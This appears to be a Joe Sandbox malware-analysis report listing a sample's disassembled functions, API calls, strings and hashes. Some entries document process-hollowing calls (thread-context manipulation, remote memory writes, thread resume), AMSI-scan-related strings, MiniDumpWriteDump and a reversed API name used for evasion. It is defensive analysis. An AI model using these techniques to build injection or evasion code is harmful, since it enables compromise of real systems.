                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Eventtime
                                                                            • String ID:
                                                                            • API String ID: 2982266575-0
                                                                            • Opcode ID: b1f87e6a74a361135eab9c192d36d5b4bff88b2f3d030cd1c53168b511ffebcc
                                                                            • Instruction ID: 3ae276e00207e238fc391cf3c29dec3e2cf118ae97fe36c06001aaa7d4c27679
                                                                            • Opcode Fuzzy Hash: b1f87e6a74a361135eab9c192d36d5b4bff88b2f3d030cd1c53168b511ffebcc
                                                                            • Instruction Fuzzy Hash: 5DC092F97943003EFA50AAA99CE2F3316ADD349B10F141412B708EE2C2E6E368104E68
                                                                            Function 02884C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02884C3F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID:
                                                                            • API String ID: 2525500382-0
                                                                            • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                            • Instruction ID: fdf90b06bd16590d9cca406ffb8d1a6ccd14507ce152a1ff83e47bb12d03c651
                                                                            • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                            • Instruction Fuzzy Hash: AAB0123E28824B55FA9832A20F00773048E0B4028AF8400519F1CC80D4FF10C0029837
                                                                            Function 02884C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SysFreeString.OLEAUT32(00000000), ref: 02884C57
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID:
                                                                            • API String ID: 3341692771-0
                                                                            • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                            • Instruction ID: f7de8dc58bb9b7e5358cbdd3078b855a4efef4c24920cb8665af446868e55dc5
                                                                            • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                            • Instruction Fuzzy Hash: 72A022AC0003030AEF0B332C002002F223B3FE03003CAC0E88308CA0008F3A8002AE32
                                                                            Function 028815CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02881A03,?,02881FC1), ref: 028815E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: bd4e29b37d0e8be0931b2cd0d49a18b52b35cbd138d7d17561f78a42675c8bdd
                                                                            • Instruction ID: 56e8f371fdc4f91fedd5d15289a89f212d12dd10484b92f8efd186a18233872a
                                                                            • Opcode Fuzzy Hash: bd4e29b37d0e8be0931b2cd0d49a18b52b35cbd138d7d17561f78a42675c8bdd
                                                                            • Instruction Fuzzy Hash: 58F06DF4B463008FDB0ADFB99A843117BE6E78A344F108679D709DB398EB71A4028B00
                                                                            Function 02881682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02881FC1), ref: 028816A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: b60633ee20bf0b18f00a39f16a1f4a17a1c29a36b93838024a58d79907b3bc3a
                                                                            • Instruction ID: a448362a302dab5fbc4552adfce6735cb8e74bf828edb679c4e7dc60971d62c5
                                                                            • Opcode Fuzzy Hash: b60633ee20bf0b18f00a39f16a1f4a17a1c29a36b93838024a58d79907b3bc3a
                                                                            • Instruction Fuzzy Hash: 89F090B6B447996FD7119E5A9CC4792BB98FB40314F050139E94C97345D770A8218B94
                                                                            Function 028816E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02881FE4), ref: 02881704
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 0e481fdedbc48ef944bef2497688993035bf94962630d3df3ad649c9dbc17b7f
                                                                            • Instruction ID: 2f42ddadefe7c4ed6e4b67c4de7942ff6a84e99aa283ae9a6696e879940b9025
                                                                            • Opcode Fuzzy Hash: 0e481fdedbc48ef944bef2497688993035bf94962630d3df3ad649c9dbc17b7f
                                                                            • Instruction Fuzzy Hash: 91E0867D300301AFD7107A7D5D88712ABDCEB44654F144479F549DB245DB60E8118B61

                                                                            Non-executed Functions

                                                                            Function 0289AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0289ADA3,?,?,0289AE35,00000000,0289AF11), ref: 0289AB30
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0289AB48
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0289AB5A
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0289AB6C
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0289AB7E
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0289AB90
                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0289ABA2
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0289ABB4
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0289ABC6
                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0289ABD8
                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0289ABEA
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0289ABFC
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0289AC0E
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0289AC20
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0289AC32
                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0289AC44
                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0289AC56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                            • API String ID: 667068680-597814768
                                                                            • Opcode ID: ab1257d12a64c65aacb44dff1267a286ea4847cccd453918f8f4bea181eee5f9
                                                                            • Instruction ID: dacba40c3a1ae5fc629db93ab3bffc0ad8c13b6f40029502d036bab9d200b51f
                                                                            • Opcode Fuzzy Hash: ab1257d12a64c65aacb44dff1267a286ea4847cccd453918f8f4bea181eee5f9
                                                                            • Instruction Fuzzy Hash: AD31FFBCA943A49FFF54EBB8D8C4AAD73ACAF157157040D61A401DF209E678B810CF12
                                                                            Function 02898D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                              • Part of subcall function 02898788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02898814
                                                                            • GetThreadContext.KERNEL32(00000000,02907424,ScanString,029073A8,0289A93C,UacInitialize,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,UacInitialize,029073A8), ref: 02899602
                                                                              • Part of subcall function 02897A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            • SetThreadContext.KERNEL32(00000000,02907424,ScanBuffer,029073A8,0289A93C,ScanString,029073A8,0289A93C,Initialize,029073A8,0289A93C,00000000,-00000008,029074FC,00000004,02907500), ref: 0289A317
                                                                            • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02907424,ScanBuffer,029073A8,0289A93C,ScanString,029073A8,0289A93C,Initialize,029073A8,0289A93C,00000000,-00000008,029074FC), ref: 0289A324
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                            • API String ID: 2624078988-51457883
                                                                            • Opcode ID: 48ece684d3163b9f7d606c7732db967b3eecea4374dc2fde86660fee0ce7debe
                                                                            • Instruction ID: a09adeac4346721056422dbd90e6f501ed56c83b9372828cd2013e6469d328df
                                                                            • Opcode Fuzzy Hash: 48ece684d3163b9f7d606c7732db967b3eecea4374dc2fde86660fee0ce7debe
                                                                            • Instruction Fuzzy Hash: C4E2EB3EA0011A9FDF15FB68DD80BCEB3BABF85701F1441A1A109EB215DA71AE45CF52
                                                                            Function 02898D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                              • Part of subcall function 02898788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02898814
                                                                            • GetThreadContext.KERNEL32(00000000,02907424,ScanString,029073A8,0289A93C,UacInitialize,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,UacInitialize,029073A8), ref: 02899602
                                                                              • Part of subcall function 02897A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                            • API String ID: 4276370345-51457883
                                                                            • Opcode ID: fcbacde1b485dfa1123142c08cecc40d86f6215d0f72120ce2afcf1753064d63
                                                                            • Instruction ID: c3993374e870d03d5d65fbe47656e36caa4df958ed99a9ed70602acd6901fed2
                                                                            • Opcode Fuzzy Hash: fcbacde1b485dfa1123142c08cecc40d86f6215d0f72120ce2afcf1753064d63
                                                                            • Instruction Fuzzy Hash: 7AE2FB3EA0011A9FDF15FB68DD80BCE73BABF85701F1441A1A109EB215DA71AE45CF52
                                                                            Function 02885908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,02886C14,02880000,028AE790), ref: 02885925
                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 0288593C
                                                                            • lstrcpynA.KERNEL32(?,?,?), ref: 0288596C
                                                                            • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 028859D0
                                                                            • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 02885A06
                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 02885A19
                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 02885A2B
                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000,028AE790), ref: 02885A37
                                                                            • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14,02880000), ref: 02885A6B
                                                                            • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02886C14), ref: 02885A77
                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02885A99
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                            • API String ID: 3245196872-1565342463
                                                                            • Opcode ID: e18bcee217847d8372277e06a7fe190ef8f67e6548b7a92e5160503cb07b8a18
                                                                            • Instruction ID: 20da65dc1e04e5a9417f8e1c375ca4560a3256097d951bfdabffabfa27cc2806
                                                                            • Opcode Fuzzy Hash: e18bcee217847d8372277e06a7fe190ef8f67e6548b7a92e5160503cb07b8a18
                                                                            • Instruction Fuzzy Hash: 17417F7DD00219AFDB10EAE8CCC8AEEB3BDAB08350F4545A6A158E7241E7349E548F51
                                                                            Function 02885BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02885BE8
                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02885BF5
                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02885BFB
                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02885C26
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02885C6D
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02885C7D
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02885CA5
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02885CB5
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02885CDB
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02885CEB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                            • API String ID: 1599918012-2375825460
                                                                            • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                            • Instruction ID: 2cc700fcd2a38bdcf3ac671f3545c175c1555b2a707b2fc1e0f54e4efae2c6ea
                                                                            • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                            • Instruction Fuzzy Hash: 1431C77DE4026C2AFF25E6B8DC49FDE77AE9B04380F4501A19708E6181DB789E858F52
                                                                            Function 028984C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02898539
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$MemoryProtectVirtual
                                                                            • String ID: ntdll$yromeMlautriVtcetorPtN
                                                                            • API String ID: 3897345246-351734974
                                                                            • Opcode ID: 8e3ab8798127a9253dfeee4f2753ca6f6cf8ff6475ddc766c6f9df7dcfb0beeb
                                                                            • Instruction ID: 52ec1253a8d41316155cc6e9b23e9ce0a835f2af288621c559bacf71d28254ba
                                                                            • Opcode Fuzzy Hash: 8e3ab8798127a9253dfeee4f2753ca6f6cf8ff6475ddc766c6f9df7dcfb0beeb
                                                                            • Instruction Fuzzy Hash: 35012D7D64420AAFEB04EFA8EC81E9EB7EEEB49710F548450B900D7600D634B9148F25
                                                                            Function 02887FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
